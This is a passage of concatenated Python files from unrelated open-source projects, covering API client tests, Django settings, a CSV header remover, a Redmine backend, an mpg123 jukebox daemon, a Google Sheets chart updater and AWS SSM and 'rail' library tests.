self.connect.PIVOTAL_URL.should.be.equal('https://www.pivotaltracker.com/services/v5')
def test_should_have_header_with_token(self):
self.connect.headers.should.be.equal({'X-TrackerToken': 'PIVOTAL_TEST_TOKEN'})
def test_should_have_projects_url_for_list(self):
self.connect.projects_url().should.be.equal('https://www.pivotaltracker.com/services/v5/projects')
def test_should_have_projects_url_for_item(self):
self.connect.projects_url(123).should.be.equal('https://www.pivotaltracker.com/services/v5/projects/123')
def test_should_have_account_member_url(self):
self.connect.account_member_url(123, 333).should.be.equal('https://www.pivotaltracker.com/services/v5/accounts/123/memberships/333')
def test_should_have_iterations_url(self):
self.connect.iterations_url(123, 1).should.be.equal('https://www.pivotaltracker.com/services/v5/projects/123/iterations/1')
def test_should_have_project_story_url(self):
self.connect.project_story_url(123, 1234).should.be.equal('https://www.pivotaltracker.com/services/v5/projects/123/stories/1234')
def test_should_have_project_story_tasks_url(self):
self.connect.project_story_tasks_url(123, 1234).should.be.equal('https://www.pivotaltracker.com/services/v5/projects/123/stories/1234/tasks')
def test_should_have_project_story_task_url(self):
self.connect.project_story_task_url(123, 1234, 12345).should.be.equal('https://www.pivotaltracker.com/services/v5/projects/123/stories/1234/tasks/12345')
@base.TestCase.mock.patch('app.pivocram.requests')
def test_should_make_get(self, req_mock):
response = self.mock.MagicMock()
response.json.return_value = 'req-response'
req_mock.get.return_value = response
self.connect.get('url').should.be.equal('req-response')
req_mock.get.assert_called_with('url', headers={'X-TrackerToken': 'PIVOTAL_TEST_TOKEN'})
@base.TestCase.mock.patch('app.pivocram.requests')
def test_should_make_put(self, req_mock):
response = self.mock.MagicMock()
response.json.return_value = 'req-response'
req_mock.put.return_value = response
self.connect.put('url', {'data': 'value'}).should.be.equal('req-response')
req_mock.put.assert_called_with('url', {'data': 'value'}, headers={'X-TrackerToken': 'PIVOTAL_TEST_TOKEN'})
def test_should_get_projects_list(self):
self.connect.get = self.mock.MagicMock(return_value='req-response')
self.connect.projects_url = self.mock.MagicMock(return_value='url-projects')
self.connect.get_projects().should.be.equal('req-response')
self.connect.get.assert_called_with('url-projects')
def test_should_get_project(self):
self.connect.get = self.mock.MagicMock(return_value='req-response')
self.connect.projects_url = self.mock.MagicMock(return_value='url-projects')
self.connect.get_project(123).should.be.equal('req-response')
self.connect.get.assert_called_with('url-projects')
self.connect.projects_url.assert_called_with(123)
def test_should_get_project_member(self):
self.connect.get = self.mock.MagicMock(return_value='req-response')
self.connect.account_member_url = self.mock.MagicMock(return_value='url-project-member')
self.connect.get_account_member(123, 333).should.be.equal('req-response')
self.connect.get.assert_called_with('url-project-member')
self.connect.account_member_url.assert_called_with(123, 333)
def test_should_get_project_story_tasks(self):
self.connect.get = self.mock.MagicMock(return_value='req-response')
self.connect.project_story_tasks_url = self.mock.MagicMock(return_value='url-tasks')
self.connect.get_project_story_tasks(123, 1234).should.be.equal('req-response')
self.connect.get.assert_called_with('url-tasks')
self.connect.project_story_tasks_url.assert_called_with(123, 1234)
def test_should_get_iteration_stories(self):
self.connect.get = self.mock.MagicMock(return_value='req-response')
self.connect.iterations_url = self.mock.MagicMock(return_value='url-iterations')
self.connect.get_current_iteration(123, 1).should.be.equal('req-response')
self.connect.get.assert_called_with('url-iterations')
self.connect.iterations_url.assert_called_with(123, 1)
def test_should_update_story(self):
self.connect.put = self.mock.MagicMock(return_value='req-response')
self.connect.project_story_url = self.mock.MagicMock(return_value='url-stories')
self.connect.update_story(123, 1234, {'data': 'value'}).should.be.equal('req-response')
self.connect.put.assert_called_with('url-stories', {'data': 'value'})
self.connect.project_story_url.assert_called_with(123, 1234)
def test_should_update_story_task(self):
self.connect.put = self.mock.MagicMock(return_value='req-response')
self.connect.project_story_task_url = self.mock.MagicMock(return_value='url-stories')
self.connect.update_story_task(123, 1234, 12345, {'data': 'value'}).should.be.equal('req-response')
self.connect.put.assert_called_with('url-stories', {'data': 'value'})
self.connect.project_story_task_url.assert_called_with(123, 1234, 12345)
class PivocramClientTest(base.TestCase):
project_mock = {"current_iteration_number": 1}
def setUp(self):
user = self.mock.MagicMock()
user.pivotal_token = 'PIVOTAL_TEST_TOKEN'
self.client = pivocram.Client(user, project_id='PROJECT-ID')
def test_should_have_connect_attribute(self):
self.assertTrue(isinstance(self.client.connect, pivocram.Connect))
def test_should_be_create_with_project_id(self):
self.client.project_id.should.be.equal('PROJECT-ID')
def test_should_have_property_list_stories(self):
self.client._current_iteration = 'CURRENT'
self.client.current_iteration.should.be.equal('CURRENT')
def test_should_have_method_to_get_story(self):
self.client.get_story('STORY-ID').should.be.equal(None)
def test_should_have_method_to_list_story_tasks(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.get_project_story_tasks.return_value = [1, 2, 3]
self.client.get_story_tasks('STORY-ID').should.be.equal([1, 2, 3])
self.client.connect.get_project_story_tasks.assert_called_with('PROJECT-ID', 'STORY-ID')
def test_should_have_method_to_get_story_task(self):
self.client.get_story_task('STORY-ID', 'TASKS-ID').should.be.equal(None)
def test_should_get_projects(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.get_projects.return_value = [1, 2, 3]
self.client.get_projects().should.be.equal([1, 2, 3])
def test_should_get_empty_if_no_projects(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.get_projects.return_value = []
self.client.get_projects().should.be.equal([])
def test_should_set_current_iteration(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.get_project.return_value = self.project_mock
self.client._current_iteration_number = None
self.client.current_iteration_number.should.be.equal(1)
self.client.connect.get_project.assert_called_with('PROJECT-ID')
def test_should_get_current_stories(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.get_current_iteration.return_value = {'stories': [1, 2, 3]}
self.client.current_iteration.should.be.equal({'stories': [1, 2, 3]})
def test_should_update_story(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.update_story.return_value = {'id': 1234}
self.client.update_story(1234, {'data': 'value'}).should.be.equal({'id': 1234})
def test_should_complete_story_task(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.update_story_task.return_value = {'id': 1234}
self.client.complete_story_task(1234, 12345, {'data': 'value'}).should.be.equal({'id': 1234})
|
Maethorin/pivocram
|
tests/unit/test_pivocram.py
|
Python
|
mit
| 8,498
|
"""
Django settings for TaskTracker project.
Generated by 'django-admin startproject' using Django 1.9.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!ojo^0p3t2kj096an0ep+uise$z$)0qrhjbz-9621w-7takmmt'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'debug_toolbar',
'bootstrap3',
'homepage.apps.HomepageConfig',
'tasks.apps.TasksConfig',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'TaskTracker.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'TaskTracker.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME':
'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Prague'
USE_I18N = True
USE_L10N = False
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
# Date and datetime default formatting
DATE_FORMAT = 'd. m. Y'
DATETIME_FORMAT = 'd. m. Y H:i'
# Login URL
LOGIN_URL = 'homepage-login'
|
polarkac/TaskTracker
|
TaskTracker/settings.py
|
Python
|
mit
| 3,566
|
from typing import Dict, Any
from depccg.tree import Tree
from depccg.cat import Category
def _json_of_category(category: Category) -> Dict[str, Any]:
def rec(node):
if node.is_functor:
return {
'slash': node.slash,
'left': rec(node.left),
'right': rec(node.right)
}
else:
feature = node.features
return {
'base': node.base,
'feature': feature if len(feature) > 0 else None
}
return rec(category)
def json_of(
tree: Tree,
full: bool = False
) -> Dict[str, Any]:
"""a tree in Python dict object.
Args:
tree (Tree): tree object
full (bool): whether to decomopose categories into its components, i.e.,
{
'slash': '/',
'left': {'base': 'S', 'feature': 'adj'},
'right': {'base': 'NP', 'feature': None},
},
or just as a string "S[adj]/NP".
Returns:
str: tree string in the CoNLL format
"""
def rec(node: Tree) -> Dict[str, Any]:
if node.is_leaf:
res = dict(node.token)
res['cat'] = _json_of_category(node.cat) if full else str(node.cat)
return res
else:
return {
'type': node.op_string,
'cat': _json_of_category(node.cat) if full else str(node.cat),
'children': [rec(child) for child in node.children]
}
return rec(tree)
|
masashi-y/depccg
|
depccg/printer/my_json.py
|
Python
|
mit
| 1,555
|
"""
WSGI config for genoome project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "genoome.settings.development")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
jiivan/genoomy
|
genoome/genoome/wsgi.py
|
Python
|
mit
| 1,563
|
#! python3
"""Remove CSV header
Removes the header from all CSV files in the current working directory.
Note:
Outputs to ``./headerRemoved`` directory.
"""
def main():
import csv, os
os.makedirs('headerRemoved', exist_ok=True)
# Loop through every file in the current working directory.
for csvFilename in os.listdir('.'):
if not csvFilename.endswith(".csv"):
continue # skip non-csv files
print("Removing header from " + csvFilename + "...")
# Read the CSV file in (skipping first row).
csvRows = []
csvFileObj = open(csvFilename)
readerObj = csv.reader(csvFileObj)
for row in readerObj:
if readerObj.line_num == 1:
continue # skip first row
csvRows.append(row)
csvFileObj.close()
# Write out the CSV file.
csvFileObj = open(os.path.join('headerRemoved', csvFilename), 'w', newline='')
csvWriter = csv.writer(csvFileObj)
for row in csvRows:
csvWriter.writerow(row)
csvFileObj.close()
if __name__ == '__main__':
main()
|
JoseALermaIII/python-tutorials
|
pythontutorials/books/AutomateTheBoringStuff/Ch14/P3_removeCsvHeader.py
|
Python
|
mit
| 1,125
|
# -*- coding: utf-8 -*-
from redmine import Redmine
from feedbacks import settings
from base import IBackend
class RedmineBackend(IBackend):
def __init__(self):
self.redmine = Redmine(settings.DJFEEDBACK_REDMINE_URL,
key=settings.DJFEEDBACK_REDMINE_KEY)
self.project_id = settings.DJFEEDBACK_REDMINE_PROJECT_ID
def post(self, message):
tracker = message.ftype.ftype
if tracker is None:
tracker = 'bug'
email_field_id = settings.DJFEEDBACK_REDMINE_EMAIL_FIELD_ID
custom_fields = [
{
'id': email_field_id,
'value': message.email
}
]
self.redmine.issue.create(
project_id=self.project_id,
tracker_id=settings.DJFEEDBACK_REDMINE_TRACKERS[tracker],
subject=message.subj,
description=message.text,
assigned_to_id=settings.DJFEEDBACK_REDMINE_ASSIGN_TO_ID,
custom_fields=custom_fields
)
|
mpyatishev/djfeedback
|
feedbacks/backends/redmine_backend.py
|
Python
|
mit
| 1,037
|
# -*- coding: UTF-8 -*-
from django.core.management.base import BaseCommand
from optparse import make_option
import daemon
import daemon.pidfile
from signal import SIGTSTP, SIGTERM, SIGABRT
import sys, os, subprocess
import time
from jukebox.jukebox_core import api
class Command(BaseCommand):
daemon = None
proc = None
mpg123 = None
option_list = BaseCommand.option_list + (
make_option(
"--start",
action="store_true",
dest="start",
help="Start mpg123 playback"
),
make_option(
"--stop",
action="store_true",
dest="stop",
help="Stop mpg123 playback"
),
)
def handle(self, *args, **options):
# check if mpg123 is available
fin, fout = os.popen4(["which", "mpg123"])
self.mpg123 = fout.read().replace("\n", "")
if not len(self.mpg123):
print "mpg123 is not installed"
return
pidFile = os.path.dirname(
os.path.abspath(__file__)
) + "/../../daemon.pid"
if options["start"]:
if os.path.exists(pidFile):
print "Daemon already running, pid file exists"
return
pid = daemon.pidfile.TimeoutPIDLockFile(
pidFile,
10
)
print "Starting jukebox_mpg123 daemon..."
self.daemon = daemon.DaemonContext(
uid=os.getuid(),
gid=os.getgid(),
pidfile=pid,
working_directory=os.getcwd(),
detach_process=True,
signal_map={
SIGTSTP: self.shutdown,
SIGABRT: self.skipSong
}
)
with self.daemon:
print "Register player"
pid = int(open(pidFile).read())
players_api = api.players()
players_api.add(pid)
self.play()
elif options["stop"]:
if not os.path.exists(pidFile):
print "Daemon not running"
return
print "Stopping daemon..."
pid = int(open(pidFile).read())
os.kill(pid, SIGTSTP)
print "Unregister player " + str(pid)
players_api = api.players()
players_api.remove(pid)
else:
self.print_help("jukebox_mpg123", "help")
def play(self):
songs_api = api.songs()
while 1:
if self.proc is None:
song_instance = songs_api.getNextSong()
if not os.path.exists(song_instance.Filename):
print "File not found: %s" % song_instance.Filename
continue
print "Playing " + song_instance.Filename
self.proc = subprocess.Popen(
[self.mpg123, song_instance.Filename]
)
else:
if not self.proc.poll() is None:
self.proc = None
time.sleep(0.5)
def shutdown(self, signal, action):
if not self.proc is None:
os.kill(self.proc.pid, SIGTERM)
if not self.daemon is None:
self.daemon.close()
sys.exit(0)
def skipSong(self, signal, action):
if not self.proc is None:
os.kill(self.proc.pid, SIGTERM)
|
lociii/jukebox_mpg123
|
jukebox_mpg123/management/commands/jukebox_mpg123.py
|
Python
|
mit
| 3,441
|
# Przykladowy agent do zadania 'zagubiony Wumpus'. Agent porusza sie wezykiem.
import random
from action import Action
# nie zmieniac nazwy klasy
class Agent:
# nie zmieniac naglowka konstruktora, tutaj agent dostaje wszystkie informacje o srodowisku
def __init__(self, p, pj, pn, height, width, areaMap):
self.times_moved = 0
self.direction = Action.LEFT
# w ten sposob mozna zapamietac zmienne obiektu
self.p = p
self.pj = pj
self.pn = pn
self.height = height
self.width = width
self.map = areaMap
# w tym przykladzie histogram wypelniany jest tak aby na planszy wyszedl gradient
self.hist = []
for y in range(self.height):
self.hist.append([])
for x in range(self.width):
self.hist[y].append(float(y + x) / (self.width + self.height - 2))
# dopisac reszte inicjalizacji agenta
return
# nie zmieniac naglowka metody, tutaj agent dokonuje obserwacji swiata
# sensor przyjmuje wartosc True gdy agent ma uczucie stania w jamie
def sense(self, sensor):
pass
# nie zmieniac naglowka metody, tutaj agent decyduje w ktora strone sie ruszyc,
# funkcja MUSI zwrocic jedna z wartosci [Action.UP, Action.DOWN, Action.LEFT, Action.RIGHT]
def move(self):
if self.times_moved < self.width - 1:
self.times_moved += 1
return self.direction
else:
self.times_moved = 0
self.direction = Action.RIGHT if self.direction == Action.LEFT else Action.LEFT
return Action.DOWN
# nie zmieniac naglowka metody, tutaj agent udostepnia swoj histogram (ten z filtru
# histogramowego), musi to byc tablica (lista list, krotka krotek...) o wymarach takich jak
# plansza, pobranie wartosci agent.histogram()[y][x] zwraca prawdopodobienstwo stania na polu
# w wierszu y i kolumnie x
def histogram(self):
return self.hist
|
uHappyLogic/lost-wumpus
|
agents/snake_agent.py
|
Python
|
mit
| 1,993
|
#!/usr/bin/python
import json
import gspread
from oauth2client.client import SignedJwtAssertionCredentials
import datetime
from participantCollection import ParticipantCollection
# Edit Me!
participantFileNames = ['../stayclean-2014-november/participants.txt',
'../stayclean-2014-december/participants.txt',
'../stayclean-2015-january/participants.txt',
'../stayclean-2015-february/participants.txt',
'../stayclean-2015-march/participants.txt',
'../stayclean-2015-april/participants.txt',
'../stayclean-2015-may/participants.txt',
'../stayclean-2015-june/participants.txt',
'../stayclean-2015-july/participants.txt',
'../stayclean-2015-august/participants.txt',
'../stayclean-2015-september/participants.txt',
'../stayclean-2015-october/participants.txt',
'../stayclean-2015-november/participants.txt',
'../stayclean-2015-december/participants.txt',
'../stayclean-2016-january/participants.txt',
'../stayclean-2016-february/participants.txt',
'../stayclean-2016-march/participants.txt',
'../stayclean-2016-april/participants.txt',
'../stayclean-2016-may/participants.txt',
'../stayclean-2016-june/participants.txt',
'../stayclean-2016-july/participants.txt',
'./participants.txt']
sortedRelapseDates = []
for participantFileName in participantFileNames:
participants = ParticipantCollection(fileNameString=participantFileName)
sortedRelapseDates = sortedRelapseDates + participants.allRelapseDates()
sortedRelapseDates.sort()
earliestReportDate = sortedRelapseDates[0]
latestReportDate = sortedRelapseDates[-1]
reportDates = []
numberOfRelapsesPerDate = []
reportDatesAndNumberOfRelapses = {}
dayOfWeekIndexesAndNumberOfInstances = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0}
reportDate = earliestReportDate
while reportDate <= latestReportDate:
reportDatesAndNumberOfRelapses[reportDate] = 0
# dayOfWeekIndexesAndNumberOfInstances[reportDate.weekday()] = dayOfWeekIndexesAndNumberOfInstances[reportDate.weekday()] + 1
dayOfWeekIndexesAndNumberOfInstances[reportDate.weekday()] += 1
reportDate += datetime.timedelta(days=1)
for relapseDate in sortedRelapseDates:
# reportDatesAndNumberOfRelapses[relapseDate] = reportDatesAndNumberOfRelapses[relapseDate] + 1
reportDatesAndNumberOfRelapses[relapseDate] += 1
dayOfWeekIndexesAndTotalNumberOfRelapses = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0}
for participantFileName in participantFileNames:
participants = ParticipantCollection(fileNameString=participantFileName)
# print participants.relapseDayOfWeekIndexesAndParticipants()
for index, parts in participants.relapseDayOfWeekIndexesAndParticipants().iteritems():
# dayOfWeekIndexesAndTotalNumberOfRelapses[index] = dayOfWeekIndexesAndTotalNumberOfRelapses[index] + len(parts)
dayOfWeekIndexesAndTotalNumberOfRelapses[index] += len(parts)
dayOfWeekIndexesAndAverageNumberOfRelapses = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0}
for index, instances in dayOfWeekIndexesAndNumberOfInstances.iteritems():
# dayOfWeekIndexesAndAverageNumberOfRelapses[index] = int(round(float(dayOfWeekIndexesAndTotalNumberOfRelapses[index]) / float(instances)))
dayOfWeekIndexesAndAverageNumberOfRelapses[index] = float(dayOfWeekIndexesAndTotalNumberOfRelapses[index]) / float(instances)
spreadsheetTitle = "StayClean monthly challenge relapse data"
# spreadsheetTitle = "Test spreadsheet"
json_key = json.load(open('../google-oauth-credentials.json'))
scope = ['https://spreadsheets.google.com/feeds']
credentials = SignedJwtAssertionCredentials(json_key['client_email'], json_key['private_key'].encode(), scope)
gc = gspread.authorize(credentials)
spreadSheet = None
try:
spreadSheet = gc.open(spreadsheetTitle)
except gspread.exceptions.SpreadsheetNotFound:
print "No spreadsheet with title " + spreadsheetTitle
exit(1)
workSheet = spreadSheet.get_worksheet(0)
columnACells = workSheet.range("A2:A" + str(len(reportDatesAndNumberOfRelapses) + 1))
columnBCells = workSheet.range("B2:B" + str(len(reportDatesAndNumberOfRelapses) + 1))
columnCCells = workSheet.range("C2:C8")
columnDCells = workSheet.range("D2:D8")
reportDate = earliestReportDate
rowIndex = 0
while reportDate <= latestReportDate:
columnACells[rowIndex].value = str(reportDate)
columnBCells[rowIndex].value = str(reportDatesAndNumberOfRelapses[reportDate])
rowIndex += 1
reportDate += datetime.timedelta(days=1)
for weekdayIndex in range(0, 7):
weekdayName = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'][weekdayIndex]
# spreadsheetClient.UpdateCell(weekdayIndex + 2,3,weekdayName,spreadsheetId)
# spreadsheetClient.UpdateCell(weekdayIndex + 2,4,str(dayOfWeekIndexesAndAverageNumberOfRelapses[weekdayIndex]),spreadsheetId)
columnCCells[weekdayIndex].value = weekdayName
columnDCells[weekdayIndex].value = str(dayOfWeekIndexesAndAverageNumberOfRelapses[weekdayIndex])
allCells = columnACells + columnBCells + columnCCells + columnDCells
workSheet.update_cells(allCells)
exit(0)
|
foobarbazblarg/stayclean
|
stayclean-2016-august/update-google-chart.py
|
Python
|
mit
| 5,485
|
import pretend
import pytest
from botocore.exceptions import ClientError
from configstore.backends.awsssm import AwsSsmBackend
def test_awsssm_init_bad_install(monkeypatch):
monkeypatch.setattr('configstore.backends.awsssm.boto3', None)
with pytest.raises(ImportError):
AwsSsmBackend()
def test_awsssm_success(monkeypatch):
response = {'Parameter': {
'Value': 'postgres://localhost/app',
}}
fake_client = pretend.stub(
get_parameter=pretend.call_recorder(lambda Name, WithDecryption: response),
)
fake_boto3 = pretend.stub(
client=pretend.call_recorder(lambda service: fake_client),
)
monkeypatch.setattr('configstore.backends.awsssm.boto3', fake_boto3)
b = AwsSsmBackend()
value = b.get_setting('DATABASE_URL')
assert value == 'postgres://localhost/app'
assert fake_boto3.client.calls == [pretend.call('ssm')]
assert fake_client.get_parameter.calls == [
pretend.call(Name='DATABASE_URL', WithDecryption=True),
]
def test_awsssm_success_with_prefix(monkeypatch):
response = {'Parameter': {
'Value': 'off',
}}
fake_client = pretend.stub(
get_parameter=pretend.call_recorder(lambda Name, WithDecryption: response),
)
fake_boto3 = pretend.stub(
client=pretend.call_recorder(lambda service: fake_client),
)
monkeypatch.setattr('configstore.backends.awsssm.boto3', fake_boto3)
b = AwsSsmBackend('/myapp/staging/')
value = b.get_setting('DEBUG')
assert value == 'off'
assert fake_boto3.client.calls == [pretend.call('ssm')]
assert fake_client.get_parameter.calls == [
pretend.call(Name='/myapp/staging/DEBUG', WithDecryption=True),
]
def test_awsssm_missing(monkeypatch):
error = ClientError({'Error': {'Code': 'ParameterNotFound'}}, 'get_parameter')
fake_client = pretend.stub(
get_parameter=pretend.raiser(error),
)
fake_boto3 = pretend.stub(
client=lambda service: fake_client,
)
monkeypatch.setattr('configstore.backends.awsssm.boto3', fake_boto3)
b = AwsSsmBackend()
value = b.get_setting('/app1/TEMPLATE_DEBUG')
assert value is None
def test_awsssm_missing_with_prefix(monkeypatch):
error = ClientError({'Error': {'Code': 'ParameterNotFound'}}, 'get_parameter')
fake_client = pretend.stub(
get_parameter=pretend.raiser(error),
)
fake_boto3 = pretend.stub(
client=lambda service: fake_client,
)
monkeypatch.setattr('configstore.backends.awsssm.boto3', fake_boto3)
b = AwsSsmBackend('/app1/')
value = b.get_setting('TEMPLATE_DEBUG')
assert value is None
def test_awsssm_error(monkeypatch):
error = ClientError({'Error': {'Code': 'SomethingBad'}}, 'get_parameter')
fake_client = pretend.stub(
get_parameter=pretend.raiser(error),
)
fake_boto3 = pretend.stub(
client=lambda service: fake_client,
)
monkeypatch.setattr('configstore.backends.awsssm.boto3', fake_boto3)
b = AwsSsmBackend('/app1/')
with pytest.raises(ClientError):
b.get_setting('TEMPLATE_DEBUG')
|
caravancoop/configstore
|
tests/test_awsssm.py
|
Python
|
mit
| 3,127
|
import sys
import traceback
import unittest
import unittest.mock
import rail
class TestIdentity(unittest.TestCase):
def test_returns_input_value(self):
value = unittest.mock.Mock()
self.assertEqual(value, rail.identity(value))
class TestNot(unittest.TestCase):
def test_returns_inverse_for_bool(self):
self.assertEquals(True, rail.not_(False))
self.assertEquals(False, rail.not_(True))
def test_returns_inverse_for_truthy(self):
self.assertEquals(True, rail.not_([]))
self.assertEquals(False, rail.not_([0]))
class TestRaise(unittest.TestCase):
def test_raises_exception(self):
with self.assertRaises(ValueError) as context:
rail.raise_(ValueError('exception'))
self.assertEqual('exception', str(context.exception))
def test_preserves_traceback_when_reraising_without_exception(self):
def func(exception):
raise exception
try:
try:
func(ValueError('exception'))
except ValueError:
expected_exc_info = sys.exc_info()
rail.raise_()
except ValueError:
actual_exc_info = sys.exc_info()
self.assertEqual(expected_exc_info[0], actual_exc_info[0])
self.assertEqual(expected_exc_info[1], actual_exc_info[1])
expected_tb = traceback.format_tb(expected_exc_info[2])
actual_tb = traceback.format_tb(actual_exc_info[2])
self.assertEqual(expected_tb, actual_tb[-len(expected_tb):])
def test_preserves_traceback_when_reraising_with_exception(self):
def func(exception):
raise exception
try:
try:
func(ValueError('exception'))
except ValueError as exception:
expected_exc_info = sys.exc_info()
rail.raise_(exception)
except ValueError:
actual_exc_info = sys.exc_info()
self.assertEqual(expected_exc_info[0], actual_exc_info[0])
self.assertEqual(expected_exc_info[1], actual_exc_info[1])
expected_tb = traceback.format_tb(expected_exc_info[2])
actual_tb = traceback.format_tb(actual_exc_info[2])
self.assertEqual(expected_tb, actual_tb[-len(expected_tb):])
class TestTry(unittest.TestCase):
def test_no_exception_raised(self):
input = unittest.mock.Mock()
expected_value = unittest.mock.Mock()
func = unittest.mock.Mock(return_value=expected_value)
handle = unittest.mock.Mock()
self.assertEqual(expected_value, rail.try_(func, handle)(input))
func.assert_called_once_with(input)
handle.assert_not_called()
def test_exception_raised(self):
input = unittest.mock.Mock()
exception = ValueError('value')
func = unittest.mock.Mock(side_effect=lambda _: rail.raise_(exception))
output = unittest.mock.Mock()
handle = unittest.mock.Mock(return_value=output)
self.assertEqual(output, rail.try_(func, handle)(input))
func.assert_called_once_with(input)
handle.assert_called_once_with(exception)
class TestMatch(unittest.TestCase):
def test_no_match_statements_provided(self):
value = unittest.mock.Mock()
with self.assertRaises(rail.UnmatchedValueError) as context:
rail.match()(value)
self.assertEqual(value, context.exception.value)
def test_value_unmatched_by_all_match_statements(self):
value = unittest.mock.Mock()
with self.assertRaises(rail.UnmatchedValueError) as context:
match = rail.match(
(lambda _: False, lambda _: unittest.mock.Mock()),
(lambda _: False, lambda _: unittest.mock.Mock()),
(lambda _: False, lambda _: unittest.mock.Mock())
)
match(value)
self.assertEqual(value, context.exception.value)
def test_value_matches_single_match_statement(self):
expected_value = unittest.mock.Mock()
match = rail.match(
(lambda _: False, lambda _: unittest.mock.Mock()),
(lambda _: True, lambda _: expected_value),
(lambda _: False, lambda _: unittest.mock.Mock())
)
self.assertEqual(expected_value, match(unittest.mock.Mock()))
def test_value_matches_multiple_match_statements(self):
expected_value = unittest.mock.Mock()
match = rail.match(
(lambda _: False, lambda _: unittest.mock.Mock()),
(lambda _: True, lambda _: expected_value),
(lambda _: True, lambda _: unittest.mock.Mock())
)
self.assertEqual(expected_value, match(unittest.mock.Mock()))
class TestMatchType(unittest.TestCase):
def test_no_match_statements_provided(self):
value = unittest.mock.Mock()
with self.assertRaises(rail.UnmatchedValueError) as context:
rail.match_type()(value)
self.assertEqual(value, context.exception.value)
def test_value_unmatched_by_all_match_statements(self):
value = unittest.mock.Mock()
with self.assertRaises(rail.UnmatchedValueError) as context:
match = rail.match_type(
(str, lambda _: unittest.mock.Mock()),
(float, lambda _: unittest.mock.Mock()),
(Exception, lambda _: unittest.mock.Mock())
)
match(value)
self.assertEqual(value, context.exception.value)
def test_value_matches_single_match_statement(self):
expected_value = unittest.mock.Mock()
match = rail.match_type(
(int, lambda _: unittest.mock.Mock()),
(unittest.mock.Mock, lambda _: expected_value),
(dict, lambda _: unittest.mock.Mock())
)
self.assertEqual(expected_value, match(unittest.mock.Mock()))
def test_value_matches_multiple_match_statements(self):
expected_value = unittest.mock.Mock()
match = rail.match_type(
(bool, lambda _: unittest.mock.Mock()),
(unittest.mock.Mock, lambda _: expected_value),
(unittest.mock.Mock, lambda _: unittest.mock.Mock())
)
self.assertEqual(expected_value, match(unittest.mock.Mock()))
def test_value_subclass_of_match_type(self):
expected_value = unittest.mock.Mock()
match = rail.match_type(
(bool, lambda _: unittest.mock.Mock()),
(object, lambda _: expected_value),
(unittest.mock.Mock, lambda _: unittest.mock.Mock())
)
self.assertEqual(expected_value, match(unittest.mock.Mock()))
class TestMatchLength(unittest.TestCase):
